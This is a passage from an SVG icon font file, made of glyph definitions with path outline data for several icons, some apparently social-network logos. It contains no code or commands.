d="M583 383q35 0 59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5l-166 3v-170q0 -34 -24.5 -58.5t-59.5 -24.5t-59 24.5t-24 58.5l3 170l-170 -3q-35 0 -59 24.5t-24 58.5t24 58.5t59 24.5h170l-3 167q0 34 24 58.5t59 24.5t59.5 -24.5t24.5 -58.5v-167h166z" />
    <glyph glyph-name="glyph208" unicode="&#xe0d0;" horiz-adv-x="833" 
d="M604 633q-60 0 -103 -42.5t-43 -102.5v-63h-83v63q0 60 -43 102.5t-103 42.5t-103 -42.5t-43 -102.5t43 -103t103 -43h63v-84h-63q-60 0 -103 -43t-43 -103t43 -102.5t103 -42.5t103 42.5t43 102.5v63h83v-63q0 -60 43 -102.5t103 -42.5t103 42.5t43 102.5t-43 103
t-103 43h-62v84h62q60 0 103 43t43 103t-43 102.5t-103 42.5zM542 425v63q0 26 18 44t44 18t44.5 -18.5t18.5 -43.5q0 -26 -18.5 -44.5t-44.5 -18.5h-62zM229 425q-25 0 -43.5 18.5t-18.5 44.5t18.5 44t43.5 18q26 0 44.5 -18.5t18.5 -43.5v-63h-63zM604 50q-26 0 -44 18
t-18 44v63h62q26 0 44.5 -18.5t18.5 -44.5q0 -25 -18.5 -43.5t-44.5 -18.5zM229 50q-25 0 -43.5 18t-18.5 44t18.5 44.5t43.5 18.5h63v-63q0 -25 -18.5 -43.5t-44.5 -18.5zM604 717q94 0 161.5 -67.5t67.5 -161.5q0 -57 -26 -106.5t-71 -81.5q45 -32 71 -81.5t26 -106.5
q0 -94 -67.5 -161.5t-161.5 -67.5q-57 0 -106 26.5t-81 71.5q-32 -45 -81.5 -71.5t-106.5 -26.5q-95 0 -162 67.5t-67 161.5q0 57 26.5 106.5t71.5 81.5q-45 32 -71.5 81.5t-26.5 106.5q0 94 67 161.5t162 67.5q57 0 106.5 -26.5t81.5 -71.5q32 45 81 71.5t106 26.5z
M458 342v-84h-83v84h83z" />
    <glyph glyph-name="glyph209" unicode="&#xe0d1;" horiz-adv-x="667" 
d="M521 342h-63v-84h63q60 0 103 -43t43 -103t-43 -102.5t-103 -42.5t-103 42.5t-43 102.5v63h-83v-63q0 -60 -43 -102.5t-103 -42.5t-103 42.5t-43 102.5t43 103t103 43h62v84h-62q-60 0 -103 43t-43 103t43 102.5t103 42.5t103 -42.5t43 -102.5v-63h83v63q0 60 43 102.5
t103 42.5t103 -42.5t43 -102.5t-43 -103t-103 -43zM458 488v-63h63q25 0 43.5 18.5t18.5 44.5t-18.5 44t-43.5 18q-26 0 -44.5 -18.5t-18.5 -43.5zM208 112v63h-62q-26 0 -44.5 -18.5t-18.5 -44.5q0 -25 18.5 -43.5t44.5 -18.5t44 18t18 44zM208 425v63q0 26 -18 44t-44 18
t-44.5 -18.5t-18.5 -43.5q0 -26 18.5 -44.5t44.5 -18.5h62zM375 258v84h-83v-84h83zM521 175h-63v-63q0 -25 18.5 -43.5t44.5 -18.5q25 0 43.5 18t18.5 44t-18.5 44.5t-43.5 18.5z" />
    <glyph glyph-name="glyph210" unicode="&#xe0d2;" horiz-adv-x="708" 
d="M605 547q103 -103 103 -250q0 -148 -103 -251t-251 -103q-147 0 -250 103q-104 104 -104 251q0 146 104 250q53 53 125 31v14q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-14q32 10 66.5 2t59.5 -33zM312 592v-209q0 -17 12.5 -29t29.5 -12t29.5 12t12.5 29v209
q0 17 -12.5 29t-29.5 12t-29.5 -12t-12.5 -29zM271 433q-7 -19 -20 -33q-43 -43 -43 -103t43 -103q41 -41 103 -41t103 41q43 43 43 103t-43 103q-12 12 -19 33v-50q0 -34 -24.5 -58.5t-59.5 -24.5q-34 0 -58.5 24t-24.5 59v50zM354 109q-76 0 -131.5 55.5t-55.5 132.5
q0 78 55 133q12 12 12 29t-12 29t-29.5 12t-29.5 -12q-80 -80 -80 -191q0 -112 80 -192q79 -79 191 -79q113 0 192 79t79 192q0 112 -79 191q-12 12 -29.5 12t-29.5 -12t-12 -29t12 -29q55 -55 55 -133q0 -77 -56 -132.5t-132 -55.5z" />
    <glyph glyph-name="glyph211" unicode="&#xe0d3;" horiz-adv-x="542" 
d="M271 109q76 0 131.5 55.5t55.5 132.5q0 78 -55 133q-12 12 -12 29t12 29t29.5 12t29.5 -12q80 -80 80 -191q0 -112 -80 -192q-79 -79 -191 -79q-113 0 -192 79t-79 192q0 112 79 191q12 12 29.5 12t29.5 -12t12 -29t-12 -29q-55 -55 -55 -133q0 -77 55.5 -132.5
t132.5 -55.5zM271 342q-17 0 -29.5 12t-12.5 29v209q0 17 12.5 29t29.5 12t29 -12t12 -29v-209q0 -17 -12 -29t-29 -12z" />
    <glyph glyph-name="glyph212" unicode="&#xe0d4;" horiz-adv-x="708" 
d="M583 592q52 0 88.5 -36.5t36.5 -88.5v-417q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v417q0 52 36.5 88.5t88.5 36.5v83q0 17 12.5 29.5t29.5 12.5h375q17 0 29 -12.5t12 -29.5v-83zM208 633v-208h292v208h-292zM125 508q-17 0 -29.5 -12
t-12.5 -29v-105q0 -25 18.5 -43.5t44.5 -18.5h416q26 0 44.5 18.5t18.5 43.5v105q0 17 -12.5 29t-29.5 12v-125q0 -17 -12 -29t-29 -12h-375q-17 0 -29.5 12t-12.5 29v125zM583 8q17 0 29.5 12.5t12.5 29.5v230q-29 -22 -63 -22h-416q-34 0 -63 22v-230q0 -17 12.5 -29.5
t29.5 -12.5h458zM438 508q20 0 20 -20q0 -21 -20 -21h-167q-9 0 -15 6t-6 15q0 20 21 20h167zM500 133q9 0 15 -6t6 -15q0 -20 -21 -20h-292q-20 0 -20 20q0 21 20 21h292zM438 592q20 0 20 -21t-20 -21h-167q-9 0 -15 6t-6 15t6 15t15 6h167z" />
    <glyph glyph-name="glyph213" unicode="&#xe0d5;" horiz-adv-x="708" 
d="M0 144q0 65 54 94q-54 28 -54 93v73q0 60 43 103t103 43h31q5 62 55.5 104t121.5 42t121.5 -42t55.5 -104h31q60 0 103 -43t43 -103v-73q0 -65 -54 -94q54 -28 54 -93v-115q0 -60 -43 -103t-103 -43h-114q-65 0 -94 54q-28 -54 -94 -54h-114q-60 0 -103 43t-43 103v115z
M625 29v115q0 20 -15 20q-10 0 -24 -10t-34 -10q-30 0 -51.5 27.5t-21.5 66.5t21.5 66t51.5 27q22 0 41 -16q7 -5 16 -5q16 0 16 21v73q0 26 -18.5 44.5t-44.5 18.5h-114q-13 0 -18.5 7.5t2.5 24.5q16 19 16 41q0 30 -27.5 51t-66.5 21t-66.5 -21t-27.5 -51q0 -17 11 -35
q14 -21 9 -29.5t-20 -8.5h-114q-26 0 -44.5 -18.5t-18.5 -44.5v-73q0 -21 16 -21q7 0 23 11q14 10 34 10q30 0 51.5 -27t21.5 -66t-21.5 -66.5t-51.5 -27.5q-22 0 -41 16q-8 5 -16 5q-16 0 -16 -21v-115q0 -25 18.5 -43.5t44.5 -18.5h114q15 0 19.5 8.5t-8.5 29.5
q-11 16 -11 35q0 30 27.5 51t66.5 21t66.5 -21t27.5 -51q0 -22 -16 -41q-8 -17 -2.5 -24.5t18.5 -7.5h114q26 0 44.5 18.5t18.5 43.5zM83 271v-66q5 2 16 2q23 0 44 -16q6 -6 13 -6q12 0 21.5 15.5t9.5 37.5t-9.5 37t-21.5 15q-6 0 -14 -6q-23 -15 -44 -15q-5 0 -15 2z
M610 206q5 0 15 -2v66q-5 -2 -16 -2q-22 0 -43 16q-6 6 -14 6q-12 0 -21.5 -15t-9.5 -37t9.5 -37.5t21.5 -15.5q6 0 14 6q22 15 44 15zM320 -33h67q-8 31 13 59q6 6 6 14q0 12 -15 21.5t-37 9.5t-37 -9.5t-15 -21.5q0 -7 6 -15q20 -29 12 -58z" />
    <glyph glyph-name="glyph214" unicode="&#xe0d6;" horiz-adv-x="542" 
d="M469 331q-30 0 -51.5 -27t-21.5 -66t21.5 -66.5t51.5 -27.5q17 0 34 10q21 14 30 9.5t9 -19.5v-115q0 -25 -18.5 -43.5t-44.5 -18.5h-114q-13 0 -19 7.5t2 24.5q17 20 17 41q0 30 -27.5 51t-66.5 21t-66.5 -21t-27.5 -51q0 -18 10 -35q14 -21 9.5 -29.5t-19.5 -8.5h-115
q-26 0 -44 18.5t-18 43.5v115q0 13 7.5 18.5t24.5 -2.5q19 -16 41 -16q30 0 51.5 27.5t21.5 66.5t-21.5 66t-51.5 27q-17 0 -34 -10q-21 -14 -30 -9.5t-9 19.5v73q0 26 18.5 44.5t43.5 18.5h115q15 0 19.5 8.5t-8.5 29.5q-11 16 -11 35q0 30 27.5 51t66.5 21t66.5 -21
t27.5 -51q0 -21 -17 -41q-8 -17 -2 -24.5t19 -7.5h114q25 0 44 -18.5t19 -44.5v-73q0 -13 -7.5 -18.5t-24.5 2.5q-19 16 -41 16z" />
    <glyph glyph-name="glyph215" unicode="&#xe0d7;" horiz-adv-x="708" 
d="M354 612q146 0 250 -104t104 -250t-104 -250t-250 -104t-250 104t-104 250t104 250t250 104zM354 -12q112 0 191.5 79t79.5 191t-79.5 191.5t-191.5 79.5t-191.5 -79.5t-79.5 -191.5t79.5 -191t191.5 -79zM500 300q-42 -9 -42 -42q0 -32 42 -41h37q-12 -53 -50.5 -91
t-90.5 -50v36q-9 42 -42 42t-42 -42v-36q-52 12 -90 50t-50 91h36q42 9 42 41q0 33 -42 42h-36q12 53 50 91t90 50v-37q9 -42 42 -42q17 0 29.5 12.5t12.5 29.5v37q52 -12 90.5 -50.5t50.5 -90.5h-37zM475 179q-26 8 -42 30t-16 49t16 49t42 30q-17 25 -42 42
q-8 -26 -30 -42t-49 -16t-49 16t-30 42q-25 -17 -42 -42q26 -8 42.5 -30t16.5 -49t-16.5 -49t-42.5 -30q15 -24 42 -41q8 26 30 42t49 16t49 -16t30 -42q27 17 42 41z" />
    <glyph glyph-name="glyph216" unicode="&#xe0d8;" horiz-adv-x="583" 
d="M292 -33q-121 0 -206.5 85t-85.5 206t85.5 206.5t206.5 85.5t206 -85.5t85 -206.5t-85 -206t-206 -85zM250 462q-62 -13 -105.5 -56.5t-56.5 -105.5h79q17 0 29 -12.5t12 -29.5t-12 -29t-29 -12h-79q13 -62 57 -106t105 -57v79q0 17 12.5 29.5t29.5 12.5t29 -12.5
t12 -29.5v-79q61 13 105.5 57t57.5 106h-79q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h79q-13 61 -57 105t-106 57v-79q0 -17 -12 -29t-29 -12t-29.5 12t-12.5 29v79z" />
    <glyph glyph-name="glyph217" unicode="&#xe0d9;" horiz-adv-x="667" 
d="M557 592q43 0 76 -33t34 -95v-206q0 -144 -98 -238.5t-236 -94.5t-235.5 97.5t-97.5 235.5t97.5 236t235.5 98q74 0 143 -32q39 32 81 32zM180 251q0 59 43 102t102 43q46 0 80 -22l-61 -59q-25 -25 -17 -41t43 -16h213v206q0 44 -26 44q-16 0 -35 -19l-48 -48
q-65 51 -149 51q-100 0 -171 -71q-70 -70 -70 -171t70 -171q71 -71 171 -71t171 71q20 20 33 40q15 23 1.5 49t-42.5 26q-26 0 -40 -22q-19 -29 -52.5 -48t-70.5 -19q-59 0 -102 43.5t-43 102.5zM222 251q0 -43 30 -73t73 -30q42 0 73 31q8 8 14.5 17.5t9.5 15.5l2 5h-54
q-65 0 -82 39q-16 38 27 81l10 5q-48 0 -73 -25q-30 -29 -30 -66z" />
    <glyph glyph-name="glyph218" unicode="&#xe0da;" horiz-adv-x="500" 
d="M97 250q0 -59 43 -102t102 -43q37 0 70 18.5t52 48.5q10 16 30.5 20.5t36.5 -6.5q17 -11 21 -30t-6 -36q-14 -22 -33 -41q-71 -71 -171 -71t-171 71t-71 171t71 171t171 71q84 0 149 -51l48 48q25 25 43 17.5t18 -42.5v-214h-214q-35 0 -42.5 18t17.5 43l61 61
q-35 23 -80 23q-59 0 -102 -43t-43 -102z" />
    <glyph glyph-name="glyph219" unicode="&#xe0db;" horiz-adv-x="667" 
d="M125 592q110 0 210.5 -43t173 -115.5t115.5 -173t43 -210.5q0 -52 -36.5 -88.5t-88.5 -36.5h-375q-69 0 -118 49t-49 118v375q0 52 36.5 88.5t88.5 36.5zM167 8q34 0 58.5 24.5t24.5 59.5q0 34 -24 58.5t-59 24.5t-59 -24.5t-24 -58.5q0 -35 24.5 -59.5t58.5 -24.5z
M355 8q26 0 44 18.5t18 44.5q0 112 -79.5 191.5t-191.5 79.5q-26 0 -44 -18.5t-18 -44.5t18 -44t44 -18q60 0 103 -43t43 -103q0 -26 18.5 -44.5t44.5 -18.5zM521 8q26 0 44.5 18.5t18.5 44.5q0 118 -59 219t-159.5 159.5t-219.5 58.5q-26 0 -44 -18t-18 -44t18 -44.5
t44 -18.5q129 0 221 -91.5t92 -220.5q0 -26 18 -44.5t44 -18.5z" />
    <glyph glyph-name="glyph220" unicode="&#xe0dc;" horiz-adv-x="667" 
d="M83 133q35 0 59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5t-59 24.5t-24 58.5t24 58.5t59 24.5zM83 633q158 0 292.5 -78t213 -212.5t78.5 -292.5q0 -34 -24.5 -58.5t-59.5 -24.5t-59 24.5t-24 58.5q0 172 -122 294.5t-295 122.5q-35 0 -59 24.5t-24 58.5t24 58.5
t59 24.5zM83 383q138 0 236 -97.5t98 -235.5q0 -34 -24.5 -58.5t-59.5 -24.5t-59 24.5t-24 58.5q0 69 -49 118t-118 49q-35 0 -59 24.5t-24 58.5t24 58.5t59 24.5z" />
    <glyph glyph-name="glyph221" unicode="&#xe0dd;" horiz-adv-x="869" 
d="M694 580q-29 0 -48 -11q-20 -10 -30 -16l-8 1q-59 0 -92 -50q-12 -18 -51 -85.5t-63 -95.5q-24 28 -64 96t-51 85q-33 50 -92 50q-46 0 -79 -33t-33 -79t33 -78.5t79 -32.5q58 0 91 48l69 -109q-32 -36 -65.5 -81t-51.5 -73l-17 -27q-18 -32 -11 -69t25 -66l18 -30
l148 272l148 -272q3 4 8 11.5t15.5 29t16.5 41t5.5 43t-12.5 40.5q-63 101 -134 181l69 109q33 -48 91 -48q46 0 78.5 32.5t32.5 78.5q0 44 -30 76q11 13 22 18q2 0 6 2.5t6 2.5l13 2h6q15 0 44 -12q-14 19 -18 22q-20 20 -63 27h-11zM608 398q-23 0 -36 19t-5 41l10 16
q13 13 31 13q19 0 32 -13t13 -31.5t-13 -31.5t-32 -13zM194 398q-18 0 -31 13t-13 31.5t13 31.5t31 13q19 0 32 -13l10 -16q8 -22 -5.5 -41t-36.5 -19zM401 241q-7 0 -11.5 5t-4.5 12q0 16 16 16q7 0 12 -4.5t5 -11.5t-5 -12t-12 -5zM694 664l19 -1q88 -10 138 -80
q18 -23 18.5 -50.5t-16.5 -50.5q-20 -26 -50 -32v-7q0 -80 -57.5 -137.5t-137.5 -57.5q-14 0 -38 4q50 -66 82 -117q25 -36 27.5 -79t-12.5 -82t-26.5 -60.5t-23.5 -38.5q-25 -34 -68 -34q-50 2 -73 43l-75 138l-74 -138q-23 -41 -74 -43q-42 0 -67 34q-12 17 -23.5 38.5
t-26.5 60.5t-12.5 82t27.5 79q38 59 81 117q-24 -4 -38 -4q-80 0 -137 57.5t-57 137.5t57 137t137 57q47 0 89 -21.5t70 -60.5q12 -17 48 -79q32 55 49 79q53 75 144 81l12 7q39 21 88 21z" />
    <glyph glyph-name="glyph222" unicode="&#xe0de;" horiz-adv-x="703" 
d="M698 570q10 -12 0 -25t-24 -7q-37 17 -61 4q23 -34 23 -74q0 -55 -38.5 -93.5t-93.5 -38.5q-49 0 -87 33l-27 -49q45 -51 61 -72.5t52 -79.5l14 -22q48 -66 -33 -185l-1 -2q-7 -9 -18.5 -8.5t-16.5 10.5l-130 238l-130 -238q-6 -11 -18 -11q-10 0 -17 9q-3 4 -10 15
t-18 33.5t-17.5 45t-4.5 49t17 46.5q75 112 126 171l-27 50q-38 -33 -87 -33q-55 0 -93.5 38.5t-38.5 93.5t38.5 93.5t93.5 38.5q66 0 110 -59q16 -24 38 -69t38 -68q16 23 38 68t38 69l2 2q40 57 108 57h3l8 5q45 28 99 19.5t84 -54.5zM131 425q17 0 29 12.5t12 29.5
t-12 29t-29 12t-29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5zM318 284q9 0 15 6t6 14q0 9 -6 15t-15 6t-15 -6t-6 -15q0 -8 6 -14t15 -6zM506 425q17 0 29 12.5t12 29.5t-12 29t-29 12t-29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5z" />
    <glyph glyph-name="glyph223" unicode="&#xe0df;" horiz-adv-x="667" 
d="M542 633q52 0 88.5 -36.5t36.5 -88.5v-458q0 -52 -36.5 -88.5t-88.5 -36.5h-417q-52 0 -88.5 36.5t-36.5 88.5v458q0 52 36.5 88.5t88.5 36.5h417zM583 50v303q-19 -11 -41 -11h-63q0 -60 -43 -103t-103 -43t-102.5 43t-42.5 103h-63q-23 0 -42 11v-303q0 -17 12.5 -29.5
t29.5 -12.5h417q17 0 29 12.5t12 29.5zM229 342q0 -43 30.5 -73.5t73.5 -30.5t74 30.5t31 73.5h-209zM583 425v83q0 17 -12 29.5t-29 12.5h-417q-17 0 -29.5 -12.5t-12.5 -29.5v-83q0 -17 12.5 -29.5t29.5 -12.5h417q17 0 29 12.5t12 29.5z" />
    <glyph glyph-name="glyph224" unicode="&#xe0e0;" horiz-adv-x="802" 
d="M760 592q18 0 31.5 -15t10.5 -33l-42 -292q-2 -15 -13.5 -25t-27.5 -10h-472l7 -42h423q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12h-458q-20 0 -37 23q0 2 -1.5 5.5t-2.5 5.5l-78 466h-58q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h93q15 0 27 -10t14 -25
l9 -48h575zM712 508h-160v-83h148zM510 508h-125v-83h125v83zM510 383h-125v-83h125v83zM344 508h-146l15 -84l6 1h125v83zM219 383l14 -83h111v83h-125zM552 300h131l11 83h-142v-83zM219 -12q0 62 62 62q63 0 63 -62q0 -63 -63 -63q-62 0 -62 63zM594 -12q0 62 62 62
q63 0 63 -62q0 -63 -63 -63q-62 0 -62 63z" />
    <glyph glyph-name="glyph225" unicode="&#xe0e1;" 
d="M368 488q77 0 130 -55t53 -133v-10q0 -31 -19 -52t-49 -21q-28 0 -50 25q-23 -25 -60 -25q-35 0 -59 24.5t-24 58.5q0 35 24 59t58 24q22 0 42 -12q5 12 17 12q16 0 16 -21v-72q0 -13 9 -22.5t22 -9.5t22 9.5t9 22.5v10q0 60 -40.5 103t-100.5 43q-59 0 -99.5 -42.5
t-40.5 -103.5q0 -60 43 -103t103 -43q44 0 82 25q10 7 20 1t11 -16.5t-9 -18.5q-49 -33 -106 -33q-77 0 -132.5 55.5t-55.5 132.5q0 78 53.5 133t130.5 55zM374 258q17 0 29 12.5t12 29.5t-12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5zM375 -75
q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5z" />
    <glyph glyph-name="glyph226" unicode="&#xe0e2;" 
d="M375 -75q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5zM375 529q95 0 162 -67.5t67 -161.5t-67 -161.5
t-162 -67.5t-162 67.5t-67 161.5t67 161.5t162 67.5zM562 304q-2 72 -51 125q-37 -50 -96 -86q15 -32 18 -41q64 14 129 2zM479 456q-48 32 -104 32q-17 0 -49 -8q40 -46 70 -100q48 28 83 76zM285 464q-73 -40 -92 -122q83 -16 166 19q-32 57 -74 103zM188 300
q0 -73 50 -126q59 81 155 116q-2 5 -4.5 10.5t-5.5 12t-5 10.5q-65 -28 -132 -28q-25 0 -58 5zM269 146q49 -34 106 -34q27 0 57 10q-4 62 -25 129q-87 -31 -138 -105zM472 140q70 43 87 122q-60 11 -112 1q19 -65 25 -123z" />
    <glyph glyph-name="glyph227" unicode="&#xe0e3;" 
d="M375 675q155 0 265 -110t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM665 330q-11 106 -87 179q-65 -85 -154 -136l24 -54q107 29 217 11zM547 535q-78 57 -172 57q-43 0 -87 -13q66 -76 117 -169q85 49 142 125zM248 562q-62 -30 -104.5 -85.5
t-55.5 -123.5q148 -24 280 37q-51 94 -120 172zM83 300q0 -108 71 -190q95 140 254 197q-11 24 -22 47q-106 -50 -218 -50q-39 0 -84 8zM183 81q83 -73 192 -73q51 0 102 19q-10 120 -54 241q-150 -53 -240 -187zM517 45q65 36 105.5 101t43.5 142q-104 18 -203 -8
q42 -112 54 -235z" />
    <glyph glyph-name="glyph228" unicode="&#xe0e4;" 
d="M640 566q110 -110 110 -266q0 -155 -110 -265t-265 -110q-156 0 -266 110q-109 109 -109 265q0 157 109 266q108 109 266 109q156 0 265 -109zM333 349q0 49 31 83.5t78 34.5h58v-84h-58q-10 0 -17.5 -7.5t-7.5 -17.5v-58h83v-83h-83v-206q93 12 164 83q86 86 86 206
q0 122 -86 207t-206 85q-122 0 -207 -85t-85 -207q0 -120 85 -206q71 -71 165 -83v206h-83v83h83v49z" />
    <glyph glyph-name="glyph229" unicode="&#xe0e5;" horiz-adv-x="375" 
d="M250 383h125v-125h-125v-291h-125v291h-125v125h125v53q0 40 12.5 81t34.5 65q46 51 116 51h87v-125h-87q-16 0 -27 -10.5t-11 -26.5v-88z" />
    <glyph glyph-name="glyph230" unicode="&#xe0e6;" 
d="M375 -75q-156 0 -266 110q-109 109 -109 265q0 157 109 266q108 109 266 109q156 0 265 -109q110 -110 110 -266q0 -155 -110 -265t-265 -110zM375 592q-122 0 -207 -85t-85 -207q0 -120 85 -206t207 -86q120 0 206 86t86 206q0 122 -86 207t-206 85zM250 196
q-43 0 -73.5 30.5t-30.5 73.5t30.5 73.5t73.5 30.5t73.5 -30.5t30.5 -73.5t-30.5 -73.5t-73.5 -30.5zM250 362q-26 0 -44 -18t-18 -44t18 -44t44 -18t44 18t18 44t-18 44t-44 18zM500 196q-43 0 -73.5 30.5t-30.5 73.5t30.5 73.5t73.5 30.5t73.5 -30.5t30.5 -73.5
t-30.5 -73.5t-73.5 -30.5z" />
    <glyph glyph-name="glyph231" unicode="&#xe0e7;" horiz-adv-x="708" 
d="M167 133q-69 0 -118 49t-49 118t49 118t118 49t117.5 -49t48.5 -118t-48.5 -118t-117.5 -49zM167 383q-35 0 -59.5 -24.5t-24.5 -58.5t24.5 -58.5t59.5 -24.5t59 24.5t24 58.5t-24 58.5t-59 24.5zM542 467q69 0 117.5 -49t48.5 -118t-48.5 -118t-117.5 -49t-118 49
t-49 118t49 118t118 49z" />
    <glyph glyph-name="glyph232" unicode="&#xe0e8;" 
d="M375 -75q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5zM413 237q0 14 7.5 25.5t19.5 11.5q11 0 18.5 -11.5
t7.5 -25.5t-7 -25t-19 -11t-19.5 11t-7.5 25zM532 369q30 -33 30 -79q0 -69 -34.5 -107t-99.5 -41h-18l-15 -1h-20h-20l-15 1h-18q-65 3 -99.5 41.5t-34.5 106.5q0 46 30 79q-4 2 -1 33q3 30 14 57q40 -5 93 -42q20 5 51 5q33 0 51 -5q50 35 83 40l10 2q11 -27 14 -57
q3 -31 -1 -33zM376 160q69 0 102 16q35 17 35 67q0 22 -14 40t-35 22q-9 1 -47.5 -1t-40.5 -2q-8 0 -36 2l-32 2q-32 1 -51 -16.5t-19 -46.5q0 -51 34 -67q33 -16 102 -16h2zM311 274q11 0 18.5 -11.5t7.5 -25.5t-7.5 -25t-18.5 -11q-12 0 -19.5 11t-7.5 25t7.5 25.5
t19.5 11.5v0z" />
    <glyph glyph-name="glyph233" unicode="&#xe0e9;" horiz-adv-x="583" 
d="M351 202q0 22 11.5 39.5t30.5 17.5q18 0 29.5 -17.5t11.5 -39.5t-11.5 -39.5t-29.5 -17.5q-19 0 -30.5 17.5t-11.5 39.5zM536 408q47 -52 47 -123q0 -129 -78 -187q-52 -39 -130 -43l-29 -1l-23 -1h-31h-32l-23 1l-28 1q-100 5 -154.5 64.5t-54.5 165.5q0 71 47 123
q-4 3 0 50q5 52 20 89q58 -6 145 -66q30 8 80 8q51 0 80 -8q37 26 75 43q37 17 53 20l16 3q16 -40 21 -89q4 -46 -1 -50zM293 82q106 0 159 25q54 25 54 104q0 34 -22 63t-54 34q-14 2 -75 -1t-62 -3q-17 0 -49.5 2t-52 2.5t-42.5 -4.5t-37 -17q-33 -30 -33 -76
q0 -79 53 -104q51 -25 158 -25h3zM192 259q18 0 29 -17.5t11 -39.5t-11 -39.5t-29 -17.5q-19 0 -31 17.5t-12 39.5t12 39.5t31 17.5v0z" />
    <glyph glyph-name="glyph234" unicode="&#xe0ea;" 
d="M408 254q3 -3 9 -8.5t8.5 -8.5t7.5 -8.5t7.5 -9t5 -9t3.5 -11t1 -11.5q0 -37 -35 -64.5t-94 -27.5q-51 0 -77.5 20.5t-26.5 50.5q0 36 37 58q41 21 96 21q-17 17 -17 33q0 12 5 17h-17q-38 0 -60.5 24t-22.5 55q0 40 33 67q35 25 87 25h100l-29 -17h-29q33 -33 33 -67
q0 -18 -6.5 -32t-13.5 -21t-21 -18l-13 -24q0 -8 13 -21zM342 308q20 0 33 13t13 37q0 33 -17 62.5t-46 29.5q-16 0 -33 -17q-6 -6 -13 -37q0 -30 17 -59t46 -29zM346 112q34 0 52.5 14t18.5 36q0 18 -12.5 32.5t-42.5 34.5h-12q-29 0 -50 -8l-4 -2l-6 -3t-6.5 -4t-7.5 -5.5
t-6.5 -6.5t-6 -8t-4 -9.5t-1.5 -11.5q0 -25 24 -42t64 -17zM500 300h-42v42h42v41h42v-41h41v-42h-41v-42h-42v42zM375 -75q-156 0 -265.5 109.5t-109.5 265.5t109.5 265.5t265.5 109.5t265.5 -109.5t109.5 -265.5t-109.5 -265.5t-265.5 -109.5zM375 592q-121 0 -206.5 -85
t-85.5 -207t85.5 -207t206.5 -85t206.5 85t85.5 207t-85.5 207t-206.5 85z" />
    <glyph glyph-name="glyph235" unicode="&#xe0eb;" horiz-adv-x="617" 
d="M321 238q21 -18 28 -25t20.5 -22.5t18 -31t4.5 -34.5q0 -61 -58.5 -107.5t-158.5 -46.5q-84 0 -129.5 33.5t-45.5 83.5q0 64 62 100q47 25 159 37q-25 25 -25 54q0 13 8 29h-25q-62 0 -99.5 40t-37.5 90q0 64 50 108q56 46 146 46h170l-50 -30h-50q59 -48 59 -112
q0 -29 -12 -53t-24.5 -35.5t-34.5 -28.5q-25 -25 -25 -41q0 -13 21 -34zM217 329q13 0 29 8.5t25 20.5q21 17 21 59q0 51 -29 100.5t-75 49.5q-16 0 -33 -8t-26 -21q-17 -30 -17 -63q0 -49 28.5 -97.5t76.5 -48.5zM217 0q57 0 89 24.5t32 63.5q0 29 -17.5 49t-70.5 59h-21
q-51 0 -87 -13q-23 -5 -47 -25t-24 -58q0 -44 40.5 -72t105.5 -28zM492 300h-84v42h84v79l41 4v-83h84v-42h-84v-83h-41v83z" />
    <glyph glyph-name="glyph236" unicode="&#xe0ec;" 
d="M375 675q156 0 265.5 -109.5t109.5 -265.5t-109.5 -265.5t-265.5 -109.5t-265.5 109.5t-109.5 265.5t109.5 265.5t265.5 109.5zM375 383q-35 0 -59 -24.5t-24 -58.5t24 -58.5t59 -24.5t59 24.5t24 58.5t-24 58.5t-59 24.5zM492 467q0 -22 14 -36t36 -14q21 0 35.5 15.5
t14.5 34.5t-15.5 34.5t-34.5 15.5t-34.5 -14.5t-15.5 -35.5zM375 8q121 0 206.5 85t85.5 207h-125q0 -69 -49 -118t-118 -49t-118 49t-49 118h-125q0 -122 85.5 -207t206.5 -85z" />
    <glyph glyph-name="glyph237" unicode="&#xe0ed;" 
d="M625 675q53 0 89 -36t36 -89v-500q0 -53 -36 -89t-89 -36h-500q-53 0 -89 36t-36 89v500q0 53 36 89t89 36h500zM375 425q-53 0 -89 -36t-36 -89t36 -89t89 -36t89 36t36 89t-36 89t-89 36zM533 508q0 -22 14 -36t36 -14q21 0 35.5 15.5t14.5 34.5t-15.5 34.5t-34.5 15.5
t-34.5 -14.5t-15.5 -35.5zM625 8q19 0 30.5 11.5t11.5 30.5v250h-84q0 -88 -60 -148t-148 -60t-148 60t-60 148h-84v-250q0 -19 11.5 -30.5t30.5 -11.5h500z" />
    <glyph glyph-name="glyph238" unicode="&#xe0ee;" 
d="M375 -75q-156 0 -266 110q-109 109 -109 265q0 157 109 266q108 109 266 109q156 0 265 -109q110 -110 110 -266q0 -155 -110 -265t-265 -110zM375 592q-122 0 -207 -85t-85 -207q0 -120 85 -206t207 -86q120 0 206 86t86 206q0 122 -86 207t-206 85zM467 203q83 0 83 55
q0 47 -53 59l-26 5q-22 6 -22 24q0 21 27 21q30 0 32 -24l41 4q-5 52 -70 52q-71 0 -71 -59q0 -43 46 -53l28 -5q28 -8 28 -25q0 -22 -43 -22q-53 0 -70 51l-14 40q-12 40 -30 56.5t-60 16.5q-40 0 -67 -30t-27 -72q0 -40 26 -67t65 -27q38 0 60 18l-12 35q-20 -20 -46 -20
